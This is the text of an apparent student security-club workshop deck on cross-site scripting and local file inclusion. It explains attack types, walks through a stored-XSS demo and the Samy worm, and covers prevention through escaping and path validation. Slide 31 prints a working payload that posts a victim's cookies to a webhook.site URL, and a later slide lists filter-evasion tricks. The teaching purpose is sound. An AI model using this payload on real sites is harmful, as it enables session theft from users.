1 of 49

XSS and LFI

slides: no

2 of 49

Announcements

  • Welcome!
  • Times for future events:
    • PBR Tuesdays 6-8PM
    • Cyber Academy Wednesdays 6-8PM
    • Special Topics 8-10PM
      • Game Hacking this week!
  • LA CTF Registration out: https://lactf.uclaacm.com/

3 of 49

Cyber Academy Plan

(schedule diagram; recoverable labels:)

  • Intro to web
  • Foundations of web hacking
  • Inject code into websites: XSS / LFI
  • Hacking databases and logins: SQL Injection
  • Practice pentesting: Bruinwalk Hacking

(week numbers 3, 4, 6 and 7 also appear in the diagram)

4 of 49

Background Information

(some OWASP stats, importance, basic ideas/hook/teaser)

5 of 49

Review: Client-Server Model

(diagram built up step by step across slides 5 to 10, with steps numbered 1 to 5; the text version of the same sequence is on slide 15)

11 of 49

Some More Important Details…

12 of 49

Client-Server Model + Context

(diagram built up across slides 12 to 14, with steps numbered 0, 1, 2, 3a, 3b, 4 and 5; the text version of the same sequence is on slide 16)

15 of 49

Web Review: Client-Server Model

  1. Your Computer (client) sends a request to a Server
  2. The Server processes the request (hopefully)
  3. The server sends back a response, containing whatever your request asked for

(replace with graphic(s))

16 of 49

Web Review: Client-Server Model + Context

  • You get a link/request created for you somewhere
  • Your Computer (client) sends the request to a Server
  • The Server processes the request (hopefully)
  • The server sends back a response, containing whatever your request asked for
  • Your computer processes the content of the request, and displays some stuff on your screen

(replace with graphic(s))

17 of 49

Web Review: Cookies

  • Your Identification
    • Third-party tracking
    • Activity records
    • Authentication
  • Mainly for convenience
    • You keep track of it (instead of the website)

18 of 49

Basics: Javascript

Website Functionality:

  • Dynamic content
  • Cookies
    • document.cookie (a property, not a function)
  • Cross-site Activity
    • fetch()
  • Much more!
    • essentially, anytime a website does something interesting

19 of 49

The Same-Origin Policy (SOP)

  • Scripts contained in a web page can only access data in another web page if they have the same origin.
    • Same origin means same scheme (e.g. http, https), hostname (domain, e.g. www.youtube.com), and port.
  • SOP only applies to scripts.
    • Images, CSS, dynamically-loaded scripts, etc. can be accessed across origins.
  • SOP can be bypassed by XSS vulnerabilities.

20 of 49

What is XSS (Cross-Site Scripting)?

  • Inject malicious scripts into a web application.
    • Often in the form of Javascript
  • Unexpected by browser.
  • Quite prevalent!

21 of 49

Reflected vs. Stored XSS

Reflected:

  • If the web application immediately includes data it receives without sanitizing (i.e. processing) it.
  • Attacker constructs a URL for the user to open in their own browser.

Stored:

  • Script that is stored in the website (e.g. in the form of forum messages).
  • Site visitors may unknowingly interact with + execute the code.

22 of 49

Reflected XSS

  • Left Image:
    • Normal input term.
  • Right Image (real world example - Uber, 2016):
    • Input term contains payload and was not sanitized.

23 of 49

Stored XSS: Samy worm

  • Displayed a message and Javascript code in user’s MySpace profile page.
  • Loading the profile page runs the code in the victim’s browser.
    • Made victim send Samy friend request.
    • Replicated payload in victim’s own profile page.

24 of 49

DOM-Based XSS

  • Attacker injects malicious payloads into webpage during runtime (i.e. without changing the HTTP response, which stored/reflected XSS do).
  • Possible when webpage contains problematic JavaScript on the user’s end.
    • Script takes data from untrusted, attacker-controllable source (e.g. URL) and puts it into a sink that supports dynamic code execution in the DOM (e.g. the HTML document)

25 of 49

Demo

26 of 49

Demo: Stored XSS attack on message board

(sequence diagram with three participants: Malicious User, Victim User and Server (stores messages); time runs downward. Messages, in order:)

  • upload message containing malicious XSS payload (Malicious User → Server)
  • return updated malicious HTML page (Server → Malicious User)
  • request message board page
  • message board HTML
  • request message board page
  • malicious message board HTML (Server → Victim User)
  • arbitrary JavaScript code execution in victim user’s browser

27 of 49

Demo: Stored XSS attack on message board

28 of 49

Demo: Stored XSS attack on message board

(the same sequence diagram, participants Malicious User, Victim User and Server (stores messages), now showing the actual HTTP exchanges in order:)

  • POST /upload?message=<script>attack()</script>&author=
  • <html>...<script>attack()</script>...</html>
  • GET /
  • <html>...clean html code…</html>
  • GET /
  • <html>...<script>attack()</script>...</html>
  • arbitrary javascript code execution in victim user’s browser.

attack() can be replaced with any javascript code

29 of 49

Demo: Stored XSS attack on message board

30 of 49

Implications

  • We were able to run malicious javascript on someone else’s browser
  • Data theft (via fetch, etc.)
    • cookies
    • jwt/session tokens
    • files
  • Browser hijacking
    • redirects user to a malicious site
    • can be used for phishing
  • Content spoofing - misinformation

31 of 49

Attack from demo

  • uses webhook.site, a temporary webhook for the stolen data
  • The payload below runs in the victim’s browser
    • sends the victim’s cookies to the webhook -> us

<script>
  fetch('https://webhook.site/<your_url>', {method: 'POST', body: document.cookie});
</script>

32 of 49

Prevention

Preventing XSS is hard (true for most types of injection as well)

  • Filters are used to remove injected code
  • Writing a fool-proof filter is easier said than done

Example:

(image: a filter and the payloads that counter it)

33 of 49

Prevention Part 2

(image: the patched filter and a counter to it)

34 of 49

Robust Filter

  • Good for the server side
  • Simply replaces any special character with its escape sequence (e.g. < becomes &lt;)
  • Characters still render, but HTML tags are not interpreted as HTML

In general you shouldn’t write your own filter.

Most modern frameworks filter (escape output) by default.

More in-depth prevention guide
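An added example (not from the slides) of the "robust filter" idea, applied to the message board from the demo: renderUnsafe() splices stored messages straight into the page, as the vulnerable server did, while renderSafe() entity-encodes every HTML special character first. The message list, the page layout and the helper names are constructed for this example.

```javascript
// Added example: the demo message board rendered with and without output escaping.
// Entity map for the five characters that can open or close HTML syntax.
// '&' must be encoded too, otherwise an entity could be smuggled through.
const HTML_ESCAPES = {
  '&': '&amp;',
  '<': '&lt;',
  '>': '&gt;',
  '"': '&quot;',
  "'": '&#39;',
};

// The "robust filter": replace each special character with its escape sequence.
// The text still renders on screen, but the browser never sees a tag.
// Note: this is correct for HTML body and quoted-attribute contexts only;
// data placed inside a <script> block or a URL needs that context's encoding.
function escapeHtml(text) {
  return String(text).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Constructed sample: one normal post and one carrying the demo payload.
const SAMPLE_MESSAGES = [
  { author: 'alice', message: 'hello board' },
  { author: '', message: '<script>attack()</script>' },
];

// Vulnerable rendering, as in the demo: stored data is included verbatim,
// so the stored payload becomes live script for every visitor.
function renderUnsafe(messages) {
  const items = messages
    .map((m) => `<li><b>${m.author}</b>: ${m.message}</li>`)
    .join('');
  return `<html><body><ul>${items}</ul></body></html>`;
}

// Hardened rendering: every user-controlled value is escaped on output.
function renderSafe(messages) {
  const items = messages
    .map((m) => `<li><b>${escapeHtml(m.author)}</b>: ${escapeHtml(m.message)}</li>`)
    .join('');
  return `<html><body><ul>${items}</ul></body></html>`;
}

// Quick self-check a test suite can run over rendered pages.
function containsScriptTag(html) {
  return /<script[\s>]/i.test(html);
}
```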

35 of 49

A Quick Aside: CSRF

  • Stands for "Cross Site Request Forgery"
  • CSRF is when you make a request to another site that the user is logged into (e.g. send a request to google.com/logout from example.com)
  • Relies on cookies being sent in the request
  • No longer works because cookies are SameSite=Lax by default (basically means they won't be sent cross-site)

36 of 49

What an "Admin Bot" is

  • Only used in CTF challenges (not in the real world)
  • Bot that opens a browser to imitate a user visiting a page
  • Useful because it automatically verifies that your XSS payload works without a real person opening the site

37 of 49

Local File Inclusion (LFI)

  • when an application uses a file path as an input
    • it assumes this path is trusted
  • typically in PHP based sites


38 of 49

How can this be a vulnerability?

  • LFI is an attack technique that tricks a web application into exposing files from its own file system
    • can potentially lead to remote code execution or XSS
    • done through the same HTTP request, from the browser

39 of 49

Simple ways to execute LFI

  • Takes place when a web app takes a path to a file as input
    • that input can be replaced with a … local file

  • Traversing directories and exposing files
  • Remote code execution
    • If you are able to upload files and know the path they are stored at, you can potentially execute any server-side malicious code you want

40 of 49

How can you test this vulnerability?

  • When a function opens a file and includes it inside the web document
    • check whether the path is filtered/validated
  • Test your own application!
    • try to make it show other files
    • don’t take file names from the user

41 of 49

How to protect your web app?

  • Databases
    • Instead of including files on your web server
  • Assigning IDs
    • save file paths under IDs, which the user cannot alter
  • Server instructions
    • have the server send download headers automatically instead of executing files in directories
  • Prevent file traversal / path inputs from the user

(diagram with labels WEB APP, LFI, XSS, US)

42 of 49

A Sample Exploit

43 of 49

Samy

(some recent examples: zoom xss exploit, any of various browser exploits, etc)

https://thehackernews.com/2022/04/critical-lfi-vulnerability-reported-in.html

https://portswigger.net/daily-swig/zoom-whiteboard-patches-xss-bug

(samy? Edit: slightly went over in stored xss slide example as well)

44 of 49

Samy

45 of 49

Samy

MySpace Filters:

  • most tags (a, img, div, embed, script, body)
  • event-handler attributes (onSomething)
  • the word javascript
  • escaped quotes

Other measures:

  • XML/HTTP requests prevented (onreadystatechange removed)
  • hash generated from pre-post page

46 of 49

Samy

“In the interest of…interest”

Tricks to know:

  • Some browsers allow javascript in CSS tags
  • Splitting keywords (‘inne’+ ‘rHTML’; “java\nscript”)
  • Reloading on a different domain to get around Same-Origin Policy
  • Manually escaping some data

More details here

47 of 49

Samy

When Samy’s XSS Myspace Post was viewed:

  • Added Samy as a friend
  • Made the same post on their page
  • Appended to bio: “but most of all, samy is my hero”

Results:

  • Over 1 million friend requests in 20 hours
  • Fastest spreading virus of all time
  • Received three years' probation, one computer, no access to the Internet; 90 days' community service, $15,000–20,000 in restitution

48 of 49

Try It Yourself!

  • Challenges are up at acmcyber.com/challenges
  • Cyber Academy rules:
    • individual
    • you have to re-create your account if you made one under your Discord username for GM
    • but feel free to ask for help in #questions
      • can also PM the challenge author if your question will give away part of solution!
    • can work on past challenges from previous weeks
    • will have until weekend before CTF After Dark (Week 7 Sunday)
      • writeups and solutions for all weeks will be released then

49 of 49

Thanks for coming!

Check out our linktree:

linktr.ee/uclacyber